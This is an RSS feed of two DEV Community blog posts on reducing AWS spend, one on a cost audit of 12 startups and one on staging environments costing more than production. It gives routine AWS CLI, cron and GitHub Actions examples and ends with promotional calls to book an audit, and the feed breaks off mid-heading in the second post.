<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Yash Pritwani</title>
    <description>The latest articles on DEV Community by Yash Pritwani (@yash_pritwani_07a77613fd6).</description>
    <link>https://dev.to/yash_pritwani_07a77613fd6</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3885613%2F512bbd07-6ae3-485a-9e20-dd9e92758241.jpg</url>
      <title>DEV Community: Yash Pritwani</title>
      <link>https://dev.to/yash_pritwani_07a77613fd6</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/yash_pritwani_07a77613fd6"/>
    <language>en</language>
    <item>
      <title>We Audited 12 Startups' AWS Bills — Average Waste: 43%</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Fri, 08 May 2026 06:00:46 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/we-audited-12-startups-aws-bills-average-waste-43-100c</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/we-audited-12-startups-aws-bills-average-waste-43-100c</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/startup-aws-cost-audit-43-percent-waste" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/startup-aws-cost-audit-43-percent-waste?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=startup-aws-cost-audit-43-percent-waste" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  We Audited 12 Startups' AWS Bills — Average Waste: 43%
&lt;/h1&gt;

&lt;p&gt;Last quarter, we ran infrastructure cost audits for 12 startups (seed to Series B). The results were consistent and painful: every single one was wasting between 28% and 67% of their AWS spend.&lt;/p&gt;

&lt;p&gt;Not because they were stupid. Because AWS makes it trivially easy to provision resources and quietly expensive to maintain them.&lt;/p&gt;

&lt;p&gt;Here's exactly what we found and how to fix it in 45 minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 5 Biggest Cost Leaks (In Order of Impact)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. NAT Gateway Charges: The Silent $540/Month Tax
&lt;/h3&gt;

&lt;p&gt;Every startup we audited was running 3 NAT Gateways (one per AZ) at $180/month each — $540/month for outbound internet traffic routing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The reality:&lt;/strong&gt; A 4-person engineering team with a single-service backend does not need multi-AZ redundancy for NAT. Your app server can tolerate a single NAT Gateway. If it goes down, requests retry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Reduce to 1 NAT Gateway in your primary AZ. If your app is truly multi-AZ critical, use VPC endpoints for AWS services (S3, DynamoDB, SQS) to eliminate NAT traffic for internal AWS calls.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $360/month (67% reduction in NAT costs)&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Oversized RDS Instances: Paying for 12x the CPU You Need
&lt;/h3&gt;

&lt;p&gt;8 out of 12 startups were running &lt;code&gt;db.r5.xlarge&lt;/code&gt; or larger ($800+/month) with CPU utilization under 10%.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this happens:&lt;/strong&gt; The RDS instance wizard defaults to production-grade instances. Developers pick "recommended" and forget. RDS has no auto-downsize.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check your actual utilization&lt;/span&gt;
aws cloudwatch get-metric-statistics &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; AWS/RDS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metric-name&lt;/span&gt; CPUUtilization &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--dimensions&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;DBInstanceIdentifier,Value&lt;span class="o"&gt;=&lt;/span&gt;YOUR_DB &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--start-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'30 days ago'&lt;/span&gt; &lt;span class="nt"&gt;--iso-8601&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--end-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;--iso-8601&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--period&lt;/span&gt; 86400 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--statistics&lt;/span&gt; Average Maximum
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If your P99 CPU is under 40%, drop one instance class. Under 20%? Drop two.&lt;/p&gt;

&lt;p&gt;A &lt;code&gt;db.t3.medium&lt;/code&gt; ($70/month) handles most startup workloads beautifully until you hit 500+ concurrent connections.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $500-730/month per instance&lt;/p&gt;

&lt;h3&gt;
  
  
  3. CloudWatch Log Retention: Paying Forever for Logs Nobody Reads
&lt;/h3&gt;

&lt;p&gt;Default log retention: &lt;strong&gt;Never expire&lt;/strong&gt;. Cost: $0.03/GB/month stored, $0.50/GB ingested.&lt;/p&gt;

&lt;p&gt;One startup had 4TB of CloudWatch logs going back to 2023. Cost: $120/month storage + $200/month ingestion for verbose DEBUG logs in production.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Set 14-day retention on all log groups&lt;/span&gt;
aws logs describe-log-groups &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'logGroups[].logGroupName'&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; text | &lt;span class="se"&gt;\&lt;/span&gt;
  xargs &lt;span class="nt"&gt;-I&lt;/span&gt; &lt;span class="o"&gt;{}&lt;/span&gt; aws logs put-retention-policy &lt;span class="nt"&gt;--log-group-name&lt;/span&gt; &lt;span class="o"&gt;{}&lt;/span&gt; &lt;span class="nt"&gt;--retention-in-days&lt;/span&gt; 14
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For long-term analysis, export to S3 ($0.023/GB/month — 75% cheaper) and query with Athena on-demand.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $200-400/month&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Orphaned EBS Snapshots: Ghost Costs From Deleted Instances
&lt;/h3&gt;

&lt;p&gt;When you terminate an EC2 instance, its EBS snapshots stay. Silently. At $0.05/GB/month.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The find script:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find snapshots with no matching volume&lt;/span&gt;
aws ec2 describe-snapshots &lt;span class="nt"&gt;--owner-ids&lt;/span&gt; self &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'Snapshots[?!VolumeId].{ID:SnapshotId,Size:VolumeSize,Created:StartTime}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One client: 2.3TB of orphaned snapshots. $115/month for dead data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $50-230/month&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Load Balancers for Internal Services: $16/Month Each for Nothing
&lt;/h3&gt;

&lt;p&gt;Every ALB costs $16/month base + traffic charges. We found startups running 4-6 ALBs for services that only communicate internally.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Replace internal ALBs with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Docker service DNS (free, already works in compose/swarm)&lt;/li&gt;
&lt;li&gt;AWS Cloud Map for service discovery ($0.10/month per service)&lt;/li&gt;
&lt;li&gt;Or simply direct IP/port references behind a VPC&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; $64-96/month&lt;/p&gt;

&lt;h2&gt;
  
  
  The 45-Minute Audit Process
&lt;/h2&gt;

&lt;p&gt;You can run this yourself. Right now.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1 (10 min): Export Cost Explorer data&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ce get-cost-and-usage &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--time-period&lt;/span&gt; &lt;span class="nv"&gt;Start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'90 days ago'&lt;/span&gt; +%Y-%m-%d&lt;span class="si"&gt;)&lt;/span&gt;,End&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%Y-%m-%d&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--granularity&lt;/span&gt; MONTHLY &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metrics&lt;/span&gt; &lt;span class="s2"&gt;"UnblendedCost"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--group-by&lt;/span&gt; &lt;span class="nv"&gt;Type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;DIMENSION,Key&lt;span class="o"&gt;=&lt;/span&gt;SERVICE &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; json &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; cost-report.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 2 (15 min): Map utilization vs. provisioned&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;RDS: CloudWatch CPU/memory utilization&lt;/li&gt;
&lt;li&gt;EC2: CPU, network I/O&lt;/li&gt;
&lt;li&gt;Lambda: concurrent executions vs. provisioned concurrency&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 3 (10 min): Find zombies&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Unattached EBS volumes&lt;/li&gt;
&lt;li&gt;Orphaned snapshots&lt;/li&gt;
&lt;li&gt;Unused Elastic IPs ($3.60/month each when unattached)&lt;/li&gt;
&lt;li&gt;Idle load balancers (0 requests/day)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 4 (10 min): Calculate savings&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Right-size instances (match actual utilization + 30% headroom)&lt;/li&gt;
&lt;li&gt;Eliminate orphaned resources&lt;/li&gt;
&lt;li&gt;Set retention policies&lt;/li&gt;
&lt;li&gt;Remove unnecessary redundancy&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Results Across 12 Audits
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Startup Stage&lt;/th&gt;
&lt;th&gt;Monthly AWS&lt;/th&gt;
&lt;th&gt;Waste Found&lt;/th&gt;
&lt;th&gt;Post-Audit Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Pre-seed (2 eng)&lt;/td&gt;
&lt;td&gt;$800&lt;/td&gt;
&lt;td&gt;52%&lt;/td&gt;
&lt;td&gt;$384&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Seed (5 eng)&lt;/td&gt;
&lt;td&gt;$2,400&lt;/td&gt;
&lt;td&gt;43%&lt;/td&gt;
&lt;td&gt;$1,368&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Series A (12 eng)&lt;/td&gt;
&lt;td&gt;$5,100&lt;/td&gt;
&lt;td&gt;38%&lt;/td&gt;
&lt;td&gt;$3,162&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Series B (25 eng)&lt;/td&gt;
&lt;td&gt;$12,000&lt;/td&gt;
&lt;td&gt;41%&lt;/td&gt;
&lt;td&gt;$7,080&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Average savings: 43%. Zero performance impact. Zero downtime.&lt;/p&gt;

&lt;h2&gt;
  
  
  When Self-Hosting Makes More Sense
&lt;/h2&gt;

&lt;p&gt;If your post-audit AWS bill is still above $2,000/month for a straightforward stack (web app + DB + cache + queue), self-hosting may save you another 80-90%.&lt;/p&gt;

&lt;p&gt;We run 84 containers for $45/month on a single Proxmox node. Same stack that costs $2,400 on AWS.&lt;/p&gt;

&lt;p&gt;That's a different conversation — but the audit comes first. Know your real spend before deciding your platform strategy.&lt;/p&gt;

&lt;h2&gt;
  
  
  Get Your Free Audit
&lt;/h2&gt;

&lt;p&gt;We do free 15-minute cloud cost reviews. No pitch, no obligation. We screen-share, run the commands above against your account, and tell you exactly what you're wasting.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Book a slot:&lt;/strong&gt; &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;techsaas.cloud/contact&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Or run the audit yourself with our free PDF checklist that includes all the CLI commands above plus 12 more checks we run.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Your Staging Environment Costs More Than Production — And Nobody Notices</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Fri, 08 May 2026 06:00:44 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/your-staging-environment-costs-more-than-production-and-nobody-notices-1abi</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/your-staging-environment-costs-more-than-production-and-nobody-notices-1abi</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/staging-environment-costs-more-than-production" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/staging-environment-costs-more-than-production?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=staging-environment-costs-more-than-production" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Your Staging Environment Costs More Than Production — And Nobody Notices
&lt;/h1&gt;

&lt;p&gt;In 8 out of our last 10 infrastructure audits, the staging environment cost more than production. Not by a little — often 30-50% more.&lt;/p&gt;

&lt;p&gt;Nobody noticed because staging bills get lumped into "infrastructure costs" and nobody questions them.&lt;/p&gt;

&lt;h2&gt;
  
  
  How Staging Sneaks Past Production
&lt;/h2&gt;

&lt;p&gt;Here's the typical pattern:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;When production was set up:&lt;/strong&gt; careful capacity planning, right-sized instances, auto-scaling configured, alarms set.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;When staging was set up:&lt;/strong&gt; "Just copy the production config so it's a faithful replica."&lt;/p&gt;

&lt;p&gt;And then:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Factor&lt;/th&gt;
&lt;th&gt;Production&lt;/th&gt;
&lt;th&gt;Staging&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Instance size&lt;/td&gt;
&lt;td&gt;t3.xlarge (right-sized)&lt;/td&gt;
&lt;td&gt;t3.xlarge (copied from prod)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Traffic&lt;/td&gt;
&lt;td&gt;50K requests/day&lt;/td&gt;
&lt;td&gt;200 requests/day&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Running hours&lt;/td&gt;
&lt;td&gt;24/7 (needed)&lt;/td&gt;
&lt;td&gt;24/7 (nobody turned it off)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auto-scaling&lt;/td&gt;
&lt;td&gt;Configured&lt;/td&gt;
&lt;td&gt;Copied but never triggers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data retention&lt;/td&gt;
&lt;td&gt;30-day rotation&lt;/td&gt;
&lt;td&gt;"Never expire" (nobody set policy)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Snapshots&lt;/td&gt;
&lt;td&gt;Weekly, pruned&lt;/td&gt;
&lt;td&gt;Daily (default), never pruned&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Production was optimized. Staging was forgotten.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Real Cost Comparison
&lt;/h2&gt;

&lt;p&gt;One client's actual AWS bill breakdown:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Production Environment:
  EC2 (auto-scaled):    $480/mo
  RDS (t3.medium):      $70/mo
  ElastiCache:          $150/mo
  ALB:                  $25/mo
  CloudWatch:           $45/mo
  EBS + Snapshots:      $60/mo
  NAT Gateway:          $180/mo
  ─────────────────────────────
  Total:                $1,010/mo

Staging Environment:
  EC2 (same size, no scaling): $720/mo  ← bigger because no auto-scale down
  RDS (r5.large "just in case"): $400/mo  ← someone picked a bigger instance
  ElastiCache:          $150/mo
  ALB:                  $25/mo
  CloudWatch:           $120/mo  ← verbose logging nobody reads
  EBS + Snapshots:      $180/mo  ← daily snapshots, never pruned
  NAT Gateway:          $180/mo
  ─────────────────────────────
  Total:                $1,775/mo  ← 76% MORE than production
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Staging: $1,775/mo. Production: $1,010/mo.&lt;/strong&gt; For an environment that handles 0.4% of the traffic.&lt;/p&gt;

&lt;h2&gt;
  
  
  Fix 1: Schedule-Based Shutdown (65% Savings Immediately)
&lt;/h2&gt;

&lt;p&gt;Your staging environment doesn't need to run at 3 AM on Sunday.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# AWS Lambda function triggered by EventBridge schedule&lt;/span&gt;
&lt;span class="c"&gt;# Stop staging at 8 PM, start at 8 AM, weekdays only&lt;/span&gt;

&lt;span class="c"&gt;# Stop Rule (cron: 0 20 ? * MON-FRI *)&lt;/span&gt;
aws ec2 stop-instances &lt;span class="nt"&gt;--instance-ids&lt;/span&gt; i-staging-web i-staging-worker

&lt;span class="c"&gt;# Start Rule (cron: 0 8 ? * MON-FRI *)&lt;/span&gt;
aws ec2 start-instances &lt;span class="nt"&gt;--instance-ids&lt;/span&gt; i-staging-web i-staging-worker
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Running hours:&lt;/strong&gt; 24/7 = 720 hours/month → Weekday 8-8 = 240 hours/month.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Savings:&lt;/strong&gt; 67% reduction on compute costs. Immediately. No impact on anyone.&lt;/p&gt;

&lt;p&gt;For Docker-based staging, even simpler:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Crontab on staging server&lt;/span&gt;
0 20 &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; 1-5 docker compose &lt;span class="nt"&gt;-f&lt;/span&gt; docker-compose.staging.yml stop
0 8  &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; 1-5 docker compose &lt;span class="nt"&gt;-f&lt;/span&gt; docker-compose.staging.yml start
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Fix 2: Right-Size Staging Instances (Additional 50-70% Savings)
&lt;/h2&gt;

&lt;p&gt;Staging doesn't need production capacity. It needs enough to run your test suite and let QA click through flows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; Staging instances should be 2 instance classes below production.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Production&lt;/th&gt;
&lt;th&gt;Staging&lt;/th&gt;
&lt;th&gt;Monthly Savings&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;t3.xlarge ($120/mo)&lt;/td&gt;
&lt;td&gt;t3.small ($15/mo)&lt;/td&gt;
&lt;td&gt;$105 (87%)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;r5.large ($180/mo)&lt;/td&gt;
&lt;td&gt;t3.medium ($30/mo)&lt;/td&gt;
&lt;td&gt;$150 (83%)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;m5.2xlarge ($280/mo)&lt;/td&gt;
&lt;td&gt;t3.large ($60/mo)&lt;/td&gt;
&lt;td&gt;$220 (78%)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;"But staging should mirror production!"&lt;/strong&gt; No. Staging should mirror production's &lt;em&gt;architecture&lt;/em&gt;, not its &lt;em&gt;capacity&lt;/em&gt;. Same services, same networking, same config — smaller instances.&lt;/p&gt;

&lt;p&gt;If your app works on a t3.small, it'll work on a t3.xlarge. The reverse is also true. Instance size doesn't affect correctness.&lt;/p&gt;

&lt;h2&gt;
  
  
  Fix 3: Ephemeral Staging (90%+ Savings)
&lt;/h2&gt;

&lt;p&gt;The best staging environment is one that doesn't exist until you need it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# GitHub Actions: spin up staging per PR&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;PR Staging&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pull_request&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;types&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;opened&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;synchronize&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;staging&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Deploy ephemeral staging&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;docker compose -f docker-compose.staging.yml up -d&lt;/span&gt;
          &lt;span class="s"&gt;echo "Staging URL: https://pr-${{ github.event.number }}.staging.example.com"&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Run E2E tests&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm run test:e2e -- --base-url https://pr-${{ github.event.number }}.staging.example.com&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Cost:&lt;/strong&gt; Only pay when PRs are open. No PR, no staging, no cost.&lt;/p&gt;

&lt;h2&gt;
  
  
  Combined Savings
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Fix&lt;/th&gt;
&lt;th&gt;Savings&lt;/th&gt;
&lt;th&gt;Effort&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Schedule-based shutdown&lt;/td&gt;
&lt;td&gt;65%&lt;/td&gt;
&lt;td&gt;30 minutes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Right-size instances&lt;/td&gt;
&lt;td&gt;50-70% on remaining&lt;/td&gt;
&lt;td&gt;1 hour&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Combined&lt;/td&gt;
&lt;td&gt;~90%&lt;/td&gt;
&lt;td&gt;1.5 hours&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ephemeral (advanced)&lt;/td&gt;
&lt;td&gt;95%+&lt;/td&gt;
&lt;td&gt;Half day&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For our client: $1,775/mo → $180/mo. &lt;strong&gt;90% reduction. 90 minutes of work.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Meta-Problem: Nobody Owns Staging Costs
&lt;/h2&gt;

&lt;p&gt;This happens because:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Dev team provisions staging&lt;/strong&gt; — optimized for "works like prod"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Finance sees one "AWS" line item&lt;/strong&gt; — doesn't break down by environment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Nobody reviews staging specifically&lt;/strong&gt; — it's invisible&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Fix the process:&lt;/strong&gt; Add environment tags to every AWS resource. Set up a Cost Explorer view that splits by environment. Review monthly.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Tag all staging resources&lt;/span&gt;
aws ec2 create-tags &lt;span class="nt"&gt;--resources&lt;/span&gt; i-xxxxx &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--tags&lt;/span&gt; &lt;span class="nv"&gt;Key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Environment,Value&lt;span class="o"&gt;=&lt;/span&gt;staging
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then in Cost Explorer, group by the &lt;code&gt;Environment&lt;/code&gt; tag. You'll immediately see the problem.&lt;/p&gt;

&lt;h2&gt;
  
  
